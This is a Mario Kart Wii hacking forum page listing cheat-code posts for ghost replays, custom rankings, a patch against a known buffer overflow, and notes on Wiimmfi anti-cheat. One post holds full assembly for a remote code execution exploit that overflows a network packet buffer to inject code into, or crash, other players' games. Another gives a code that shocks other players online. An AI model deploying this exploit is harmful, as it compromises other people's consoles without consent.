Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 222
» Latest member: AgentIMW
» Forum threads: 1,098
» Forum posts: 4,076

Full Statistics

Online Users
There are currently 65 online users.
» 0 Member(s) | 63 Guest(s)
Bing, Google

Latest Threads
Positional Selective Item...
Forum: Online; Item
Last Post: Jeffy/Wrath
41 minutes ago
» Replies: 6
» Views: 1,489
Advanced Live Replay [Wha...
Forum: Time Trials & Battle
Last Post: WhatisLoaf
Yesterday, 09:01 PM
» Replies: 0
» Views: 53
RCE Protection [Seeky]
Forum: Incomplete/Outdated Codes
Last Post: Nightcat
07-03-2020, 04:31 PM
» Replies: 2
» Views: 290
Make it to 10,000
Forum: General Discussion
Last Post: JoshuaMK
07-02-2020, 03:46 PM
» Replies: 389
» Views: 77,401
Single Banana Item Replac...
Forum: Online; Item
Last Post: Vega
07-01-2020, 12:30 PM
» Replies: 2
» Views: 2,761
Comments about the "Pleas...
Forum: Hacking General Discussion
Last Post: Vega
07-01-2020, 12:28 PM
» Replies: 1
» Views: 178
GOD Code (Table 1) [XeR]
Forum: Online; Item
Last Post: Goldi
06-30-2020, 11:28 AM
» Replies: 1
» Views: 1,704
Remote Code Execution [St...
Forum: Online Non-Item
Last Post: Cameron_MKW
06-25-2020, 12:12 PM
» Replies: 5
» Views: 555
Custom Time Trial Ranking...
Forum: Misc/Other
Last Post: Jeffy/Wrath
06-24-2020, 02:33 PM
» Replies: 2
» Views: 282
Mega Mushroom Timer (Onli...
Forum: Incomplete/Outdated Codes
Last Post: JoshuaMK
06-23-2020, 05:02 PM
» Replies: 2
» Views: 1,516

 
  Advanced Live Replay [WhatisLoaf]
Posted by: WhatisLoaf - Yesterday, 09:01 PM - Forum: Time Trials & Battle - No Replies

This code stores the inputs of a ghost when replaying it.
This will make the game replicate these inputs when either in Solo Time Trial or Ghost Race.
The latter makes comparisons in time trial recordings possible.

[1] Select the ghost you want to mimic
[2] Press "Watch Replay" and exit when the replay starts, you don't have to watch the entire replay play out.
[3] For regular live replay just press "Solo Time Trial"
[4] If you want to race a ghost just select the ghost you want to race and press "Race Ghost"

Getting 2 ghosts on your console/dolphin can be done as follows:

[1] Replace the staff ghost with one of the ghosts (like you normally would)
[2] Do a live replay with this ghost and allow it to play out so that the ghost saves (if the time is not a pb you might need Diamond's Ghost Always Saves code)
[3] Replace the staff ghost again but this time with your second ghost
[4] Done! Now you have both ghosts.

PAL
C252EDF4 00000005
899E0B53 2C0C0002
40820018 819E0BEC
A18C000E 3D608000
B18B03FE 38043E60
90040008 00000000
C2533CB4 00000004
8063D70C 818300DC
918300E0 3D808000
A18C03FE B18300E6
60000000 00000000

NTSC-U
C252A2AC 00000005
899E0B53 2C0C0002
40820018 819E0BEC
A18C000E 3D608000
B18B03FE 38043E60
90040008 00000000
C252F16C 00000004
80638F4C 818300DC
918300E0 3D808000
A18C03FE B18300E6
60000000 00000000

NTSC-J
C252E774 00000005
899E0B53 2C0C0002
40820018 819E0BEC
A18C000E 3D608000
B18B03FE 38043E60
90040008 00000000
C2533634 00000004
8063C76C 818300DC
918300E0 3D808000
A18C03FE B18300E6
60000000 00000000

NTSC-K
C251CE4C 00000005
899E0B53 2C0C0002
40820018 819E0BEC
A18C000E 3D608000
B18B03FE 38043E60
90040008 00000000
C2521D0C 00000004
8063BD4C 818300DC
918300E0 3D808000
A18C03FE B18300E6
60000000 00000000


Code:
#########################
# MAIN LIVE REPLAY CODE #
#########################

# 8052edf4 - RMCP
# 8052a2ac - RMCE
# 8052e774 - RMCJ
# 8051ce4c - RMCK

lbz r12, 0x0b53 (r30) # get the current game mode
cmpwi r12, 2
bne store_address
lwz r12, 0x0bec (r30) # get the second rkg pointer
lhz r12, 0x0e (r12) # get the input data length
lis r11, 0x8000
sth r12, 0x03fe (r11) # store it for later use
addi r0, r4, 0x3e60
store_address:
stw r0, 0x8 (r4) # default instruction

############################
# ENABLE GHOST SAVING CODE #
############################

# 80533cb4 - RMCP
# 8052f16c - RMCE
# 80533634 - RMCJ
# 80521d0c - RMCK

.set region, ''

.if     (region == 'P' || region == 'p') # RMCP
        .set Global_Offset, -0x28f4
.elseif (region == 'E' || region == 'e') # RMCE
        .set Global_Offset, -0x70b4
.elseif (region == 'J' || region == 'j') # RMCJ
        .set Global_Offset, -0x3894
.elseif (region == 'K' || region == 'k') # RMCK
        .set Global_Offset, -0x42b4
.else # Invalid Region
        .err
.endif

lwz r3, Global_Offset (r3) # default instruction
lwz r12, 0xdc (r3)
stw r12, 0xe0 (r3) # store pointer to rkg input
lis r12, 0x8000
lhz r12, 0x03fe (r12)
sth r12, 0xe6 (r3) # store input data length

Code created by: WhatisLoaf
Code credits: Seeky (documentation), Vega (code name)

Print this item

  Custom Time Trial Rankings [WhatisLoaf]
Posted by: WhatisLoaf - 06-23-2020, 08:02 PM - Forum: Misc/Other - Replies (2)

Custom Time Trial Rankings [WhatisLoaf]

Hey everyone, this code will allow you to create fully custom time trial rankings in the Mario Kart channel.
Since there is a lot of data to fill in I'm not going to post the code here as it changes heavily based on what you fill in.
Instead I've made a tool that generates these codes which you can find at customtop10.rf.gd
I know this is kind of unorthodox but this is the only way to not make it a nightmare to use.
This is my first time making a code for mkw so feel free to give feedback on what can be improved.

I've ported to all region but only tested PAL and NTSC-U, I suspect the other regions should be fine though.

The code includes Anarion's globe position changer and region changer. For the preprogrammed globe position I used Vega's extensive database of globe positions. 
Besides that there are 2 codes: A title changer (that is displayed above the rankings) and the code that fills in the entire top 10, below is the source code for both:

Custom Rankings Title:

Code:
mflr r11

bl set_address

# the entire string is placed in and can vary in length
# it's important to include 0000 at the end to terminate the string
.long XXXXXXXX

set_address:
cmpwi r14, 0x1776 # message ID for continental rankings title
bne- function_end
mflr r3 # replace the address with our address
function_end:
stw r3, 0x20(sp)
mtlr r11

Custom Top 10:
The source code here only includes 1 entry as an example. My optimisation strategy here was to make the compiled code as short as possible for the worst and most common case being 10 entries. This involved cramming all the data together and adding some extra logic at the bottom to extract the data in the correct way. This does mean that for 1 entry it looks kinda silly of course.
Code:
li r4, 0 # 0 means friend rankings which means skipping wfc connection
li r12, 1
stw r12, 0x58 (r3) # change to continental rankings (rankings don't show for some reason when it's a friend ranking)
li r12, X # amount of entries
stw r12, 0x60 (r3) # set amount of times to show
mtctr r12
addi r29, r3, 0x64 # r29-r31 are free to use

mflr r11

bl read_data

.space 4
.long 0xGGGGHHHH # millisecond/minute/second/
.llong 0xIIIIIIIIIIIIIIII # mii data / mii name
.llong 0xIIIIIIIIIIIIIIII # mii name
.llong 0xIIIIIIIIIIIIMMMM # mii name / last 2 bytes of mii data
.long 0xIIIIIIII # mii id
.llong 0xIIIIIIIIIIIIIIII # mii data
.llong 0xIIIIIIIIIIIIIIII # mii data
.llong 0xIIIIIIIIJJJJKKLL # mii data / CRC / flag / wheel

read_data:
mflr r12

# main loop that loops over all entries
loop_1:
# store time
lwzu r31, 0x04 (r12)
sth r31, 0x05 (r29)
stwu r31, 0x08 (r29)

# secondary loop to move all data per entry
li r30, 13
loop_2:
# skip the mac address of the mii data
cmpwi r30, 6
bne+ store_data
addi r29, r29, 0x04
store_data:
lwzu r31, 0x04 (r12)
stwu r31, 0x04 (r29)
subic. r30, r30, 1
bne+ loop_2

stw r4, 0x00 (r29) # clear last store
srwi r10, r31, 0x10
stw r10, 0x14 (r29) # store CRC
stb r31, 0x1B (r29) # store wheel
sth r31, 0x24 (r29) # store flag
lhz r31, -0x1A (r12)
sth r31, 0x00 (r29)  # store last 2 bytes of mii data
sth r4, -0x1E (r29) # clear last 2 bytes from temp position
addi r29, r29, 0x28 # set address for next iteration

bdnz+ loop_1

mtlr r11

Code created by: WhatisLoaf
Code credits: Anarion (globe position changer & region changer), Vega (globe position database)

Print this item

  RCE Protection [Seeky]
Posted by: Seeky - 06-22-2020, 12:26 PM - Forum: Incomplete/Outdated Codes - Replies (2)

RCE Protection [Seeky]

This code will increase the space allocated for each of the split RACE packet buffers to the maximum size that could be memcpyed into them (0xff, since the length values in the packet header are 1 byte each), preventing the buffer overflow that was used in Star's RCE code. This code was actually made a few weeks ago, as an attempt for an antifreeze originally, and turned out to be fixing the same exploit that was being used for RCE.

WARNING: There are potentially other RCE exploits in the game that aren't publicly known, this code will do nothing against them, it is specifically designed to block this exploit.

NOTE: This code is incomplete as it hasn't been tested for NTSC-J or NTSC-K

NTSC-U
08895AC4 000000FF
20070004 00000000

PAL
0889A194 000000FF
20070004 00000000

NTSC-J
088992F4 000000FF
20070004 00000000

NTSC-K
088885CC 000000FF
20070004 00000000

Code created by: Seeky

Print this item

  Remote Code Execution [Star]
Posted by: Star - 06-22-2020, 04:08 AM - Forum: Online Non-Item - Replies (5)

Remote Code Execution [Star]

This code will inject and execute arbitrary code on a client.

Code:
#============================================================#
#            Mario Kart Wii Remote Code Execution            #
#------------------------------------------------------------#
# Author  : Star                                             #
# Date    : Jun 22 2020                                      #
# File    : remote_code_execution.asm                        #
# Version : 1.1.0.2                                          #
#------------------------------------------------------------#
# Description: This code will inject and execute arbitrary   #
# code on a client.                                          #
#------------------------------------------------------------#
# Terms & Conditions: You are fully responsible for all      #
# activity that occurs while using this code. The author of  #
# this code can not be held liable to you or to anyone else  #
# as a result of damages caused by the usage of this code.   #
#============================================================#

#============================================================#
#                    Assembler Directives                    #
#============================================================#

# Constants
.set      HEADER_MAGIC_AND_CRC32_SIZE_BYTE, 8

.set      HEADER_RECORD_SIZES_LENGTH_BYTE, 8
.set      HEADER_RECORD_SIZES_LENGTH_WORD, HEADER_RECORD_SIZES_LENGTH_BYTE / 4

.set      BUFFER_OVERFLOW_PROLOGUE_SIZE_BYTE, 0x18
.set      BUFFER_OVERFLOW_PROLOGUE_SIZE_WORD, BUFFER_OVERFLOW_PROLOGUE_SIZE_BYTE / 4

.set      PAYLOAD_INSTRUCTION_SIZE_BYTE, (label_payload_end - label_payload_start)
.set      PAYLOAD_INSTRUCTION_SIZE_WORD, PAYLOAD_INSTRUCTION_SIZE_BYTE / 4

.set      PACKET_SIZE_BYTE, HEADER_MAGIC_AND_CRC32_SIZE_BYTE + HEADER_RECORD_SIZES_LENGTH_BYTE + BUFFER_OVERFLOW_PROLOGUE_SIZE_BYTE + PAYLOAD_INSTRUCTION_SIZE_BYTE

# Variables
.set      TARGET_CLIENTS_REGION, ''
.set      BOOL_CRASH_CLIENT,

# Asserts
.if       (TARGET_CLIENTS_REGION <> 'E' && TARGET_CLIENTS_REGION <> 'P' && TARGET_CLIENTS_REGION <> 'J' && TARGET_CLIENTS_REGION <> 'K')
          .err
.endif

.if       (BOOL_CRASH_CLIENT <> 0 && BOOL_CRASH_CLIENT <> 1)
          .err
.endif

#============================================================#
#                           Source                           #
#------------------------------------------------------------#
# SendRACEPacket CRC32 Arguments Address:                    #
# RMCE - 0x80653AA8                                          #
# RMCP - 0x80657F30                                          #
# RMCJ - 0x8065759C                                          #
# RMCK - 0x80646248                                          #
#============================================================#

# Increase the packet size
li        r4, PACKET_SIZE_BYTE
stw       r4, 8(r3)

# Load the pointer to the packet (Original instruction)
lwz       r3, 0(r3)

# Skip over the HEADER magic and CRC32 of the packet
addi      r5, r3, 8

#============================================================#
#                       [PAL 806591C8]                       #
#------------------------------------------------------------#
# The first byte of this data overwrites the HEADER record   #
# size in the HEADER record to 0x28. This leads to a buffer  #
# overflow when the target client's game copies 0x28 bytes   #
# of data into a fixed size buffer of 0x10 bytes.            #
#                                                            #
# The buffer overflow overwrites the pointer to the next     #
# record's buffer, to the address specified below. This      #
# address, the payload size, and a pointer to the payload    #
# are all passed as arguments to the next memcpy call.       #
#                                                            #
# The next two bytes are used in conjunction to calculate a  #
# pointer to a null pointer. This null pointer will be       #
# passed as the destination argument to the next memcpy      #
# call. This will cause the game to branch to the exception  #
# handler due to attempting an invalid memory read.          #
#                                                            #
# If you are using this code to write arbitrary values to an #
# arbitrary address, then the rest of the record sizes are   #
# set to zero. This prevents the target client from crashing #
# as their game will not attempt to copy any more data.      #
#============================================================#

bl        branch_link_record_data

# Record sizes
.byte     HEADER_MAGIC_AND_CRC32_SIZE_BYTE + HEADER_RECORD_SIZES_LENGTH_BYTE + BUFFER_OVERFLOW_PROLOGUE_SIZE_BYTE # HEADER
.byte     PAYLOAD_INSTRUCTION_SIZE_BYTE # RACEHEADER_1

.if       (BOOL_CRASH_CLIENT)
          .byte     0x54 # RACEHEADER_2
          .byte     0x01 # SELECT / ROOM
.else
          .byte     0x00 # RACEHEADER2
          .byte     0x00 # SELECT / ROOM
.endif

.byte     0x00 # RACEDATA
.byte     0x00 # USER
.byte     0x00 # ITEM
.byte     0x00 # EVENT

# Padding
.long     0x53746172
.long     0x53746172
.long     0x53746172
.long     0x53746172

#============================================================#
#                       [PAL 80659B7C]                       #
#------------------------------------------------------------#
# This value will be used as the destination to write to     #
# during the memcpy call.                                    #
#============================================================#

.if       (TARGET_CLIENTS_REGION == 'E') # RMCE
          .long 0x80226160
.elseif   (TARGET_CLIENTS_REGION == 'P') # RMCP
          .long 0x802264E4
.elseif   (TARGET_CLIENTS_REGION == 'J') # RMCJ
          .long 0x80226404
.else     # RMCK
          .long 0x80226858
.endif

#============================================================#
#                       [PAL 80659B48]                       #
#------------------------------------------------------------#
# This value will be used as the number of bytes to copy     #
# during the memset call.                                    #
#============================================================#

.long     0x00000000

#============================================================#
#                           Payload                          #
#------------------------------------------------------------#
# The following values are written to the address specified  #
# above during the memcpy call.                              #
#                                                            #
# If you crash the target client, their game will branch to  #
# the exception handler and execute these instructions.      #
#                                                            #
# 21/05/2019                                                 #
# Oh, to answer your ? in the code; yes exception handler    #
# instructions are always accessed uncached with virtual     #
# memory disabled                                            #
#============================================================#

label_payload_start:

.long     0x4800002D
.long     0xFF00FFFF
.long     0xAAD9EEFF
.long     0x52656D6F
.long     0x74652043
.long     0x6F646520
.long     0x45786563
.long     0x7574696F
.long     0x6E206279
.long     0x20537461
.long     0x72000000
.long     0x7C6802A6
.long     0x38830004
.long     0x38A30008
.long     0x3D80801A

.if       (TARGET_CLIENTS_REGION == 'E') # RMCE
          .long 0x618C4E24
.elseif   (TARGET_CLIENTS_REGION == 'P') # RMCP
          .long 0x618C4EC4
.elseif   (TARGET_CLIENTS_REGION == 'J') # RMCJ
          .long 0x618C4DE4
.else     # RMCK
          .long 0x618C5220
.endif

.long     0x7D8803A6
.long     0x4E800020

label_payload_end:

branch_link_record_data:
mflr      r6

li        r7, HEADER_RECORD_SIZES_LENGTH_WORD + BUFFER_OVERFLOW_PROLOGUE_SIZE_WORD + PAYLOAD_INSTRUCTION_SIZE_WORD
mtctr     r7

branch_write_packet_data_loop:
lwz       r7, 0(r6)
stw       r7, 0(r5)

addi      r5, r5, 4
addi      r6, r6, 4

bdnz+     branch_write_packet_data_loop

Notes:
- Github: https://github.com/StarMKWii/Mario-Kart-...-Execution

Code Creator: Star

Print this item

  Block First 8 Cups in Regionals
Posted by: Optllizer - 06-21-2020, 06:24 PM - Forum: Code Creation Support / Help - No Replies

Hello, Right now I am working on a new custom track distribution and I am stuck trying to figure out how to block the first 8 cups from being played in Regionals. Why you may ask, Well I don't want to play regular tracks in regionals, but I still want the option to tt them offline. I know that CT Code has this option but LE Code doesn't. The filter code is public on github but I don't know assembly to try and use it. I am wondering if anyone is able to try and use the CTGP 1.02 code to make a filter for LE Code.

Here is the public CT code.
https://github.com/Chadderz121/wii-ct-code

Print this item

  Comments about the "Please READ before posting any Code bugs/issues" thread
Posted by: Leseratte10 - 06-21-2020, 06:36 AM - Forum: Hacking General Discussion - Replies (1)

I can't reply to the "Please READ before posting any Code bugs/issues" announcement thread ( https://mkwii.com/showthread.php?tid=1535 ) so I'm making a new thread because I have some comments about that; if it's in the wrong sub forum please move it. 


Quote:However in the era of post-Nintendo WiFi, most users play MKWii on the Wiimmfi service, which can lead to many issues. The Wiimmfi Service has many security patches that can cause a code to be buggy or not work at all. In fact, certain popular/infamous codes have been blocked specifically. This can still effect offline-only codes (due to loading via some Wiimmfi-patching system/app)!
...
It does suck that Wiimmfi (plus corresponding Wiimmfi patchers) can cause certain codes to malfunction, but it is what it is.



1) just loading the game through a Wiimmfi patcher doesn't load any updated code at all, except for the code that downloads the actual update from Wiimmfi. Loading the game through a Wiimmfi patcher and NOT going online and just playing in offline mode does, to my knowledge, NOT influence any cheat codes from working at all. 

2) To my knowledge, going on Wiimmfi and only playing in friend rooms shouldn't influence any cheat code either. Wiimmfi may not let you connect if you are using cheats to spoof your identity, but it doesn't break any cheat codes. 

We specifically try to not affect offline cheating and cheating in friend rooms where cheating is allowed, so I'm surprised about that statement. Of course, breaking certain cheat codes in WW races might be a nice unintended side effect, but at least for friend rooms. we are regularly testing cheat codes on Wiimmfi, and we've never run into issues with cheats not working. 

Is there any cheat code that is known to break in offline mode just because it is running on a Wiimmfi-patched ISO?
And is there any cheat code (except for identity spoofing or stuff like that) that breaks in friend rooms on Wiimmfi but works in friend rooms on AltWFC?

Print this item

  Code request (Useful for many packs)
Posted by: No_Name_Guy - 06-17-2020, 11:43 AM - Forum: Code Creation Support / Help - Replies (4)

Hello, I want to make a gamemode but there is a problem: It is timer based, so, the timer will have to be different deoending on the amount of players in the room.

Can someone create a code that is an activator for player amounts? Like this:

TIMER CODE EXAMPLE
XXXXXXXX XXXXXXX -> big assembly code for the player amount activator
28YYYYYY 000000PP - activator for amount of players
04000000 00000000 - code wanted
E0000000 80008000 - terminator

Let's say I want a cheat to have differsnt values depending on the amount of players in the room
XXXXXXXX XXXXXXXX
28YYYYYY 00000001 - if 1P
04533330 38000005
e0000000 80008000
28yyyyyy 00000002 - if 2P
04533330 3800000A
e0000000 80008000
and there it goes

Print this item

  Banned file modifications on Wiimmfi
Posted by: Star - 06-14-2020, 04:24 AM - Forum: Hacking General Discussion - Replies (5)

The following files have their SHA-1 hashes sent to the server via the Wiimmfi Update code:

kartParam.bin
driverParam.bin
ItemSlot.bin

GeoHitTableItem.bin
GeoHitTableItemObj.bin
GeoHitTableKart.bin
GeoHitTableKartObj.bin

minigame.kmg
ObjFlow.bin

As of patcher v71 (2020-06-03 13:56:37)

Print this item

  Codes that are banned on Wiimmfi
Posted by: Star - 06-14-2020, 12:34 AM - Forum: Hacking General Discussion - Replies (4)

The following codes explicitly have their hook addresses validated by the Wiimmfi Update code:

https://mkwii.com/showthread.php?tid=106
https://mkwii.com/showthread.php?tid=156
https://mkwii.com/showthread.php?tid=221
https://mkwii.com/showthread.php?tid=241
https://mkwii.com/showthread.php?tid=288
https://mkwii.com/showthread.php?tid=608
https://mkwii.com/showthread.php?tid=775
https://mkwii.com/showthread.php?tid=928
https://mkwii.com/showthread.php?tid=1271
https://mkwii.com/showthread.php?tid=1393

If an address has been tampered with, their payload sends a PARAM-STRING packet to the server detailing what cheat is being used.

As of patcher v71 (2020-06-03 13:56:37)

Print this item

  Force Shock Damage [1superchip]
Posted by: 1superchip - 06-13-2020, 03:04 AM - Forum: Incomplete/Outdated Codes - Replies (1)

Force Shock Damage [1superchip]

This code will allow you to shock all other players in a race when you push the activator to shock all players. The Player ID that uses the shock can be changed, valid values for P are (0 - 11) setting the Player ID to 0 will give yourself invincibility. It is recommended to use No Lightning Flash by Anarion.

When used offline, CPU's are effected. If used in Time Trials ghosts set by humans will be effected and will get desynced.

YYYY is the controller address and ZZZZ is your button activator, do not press/hold any other buttons.

This code uses memory addresses 0x81430004 - 0x81430007. Make sure no other codes in your GCT/Cheat-Manager are using those addresses. This code is incomplete due to NTSC-K being untested.

NTSC-U
C0000000 0000000B
3C608143 80630004
2C030000 41A20040
3C608034 A063YYYY
2C03ZZZZ 40A20030
9421FF80 7D8802A6
BC610008 3860000P
3D80807A 618C91C0
7D8803A6 4E800021
B8610008 7D8803A6
38210080 4E800020
60000000 00000000
C27AE8F4 00000002
90050008 3C808143
90040004 00000000


PAL
C0000000 0000000B
3C608143 80630004
2C030000 41A20040
3C608034 A063YYYY
2C03ZZZZ 40A20030
9421FF80 7D8802A6
BC610008 3860000P
3D80807B 618C7C20
7D8803A6 4E800021
B8610008 7D8803A6
38210080 4E800020
60000000 00000000
C27BD354 00000002
90050008 3C808143
90040004 00000000


NTSC-J
C0000000 0000000B
3C608143 80630004
2C030000 41A20040
3C608034 A063YYYY
2C03ZZZZ 40A20030
9421FF80 7D8802A6
BC610008 3860000P
3D80807B 618C728C
7D8803A6 4E800021
B8610008 7D8803A6
38210080 4E800020
60000000 00000000
C27BC9C4 00000002
90050008 3C808143
90040004 00000000


NTSC-K (Untested)
C0000000 0000000B
3C608143 80630004
2C030000 41A20040
3C608033 A063YYYY
2C03ZZZZ 40A20030
9421FF80 7D8802A6
BC610008 3860000P
3D80807A 618C91C0
7D8803A6 4E800021
B8610008 7D8803A6
38210080 4E800020
60000000 00000000
C27AB714 00000002
90050008 3C808143
90040004 00000000

Code Creator: 1superchip
Code Credits: Vega

Print this item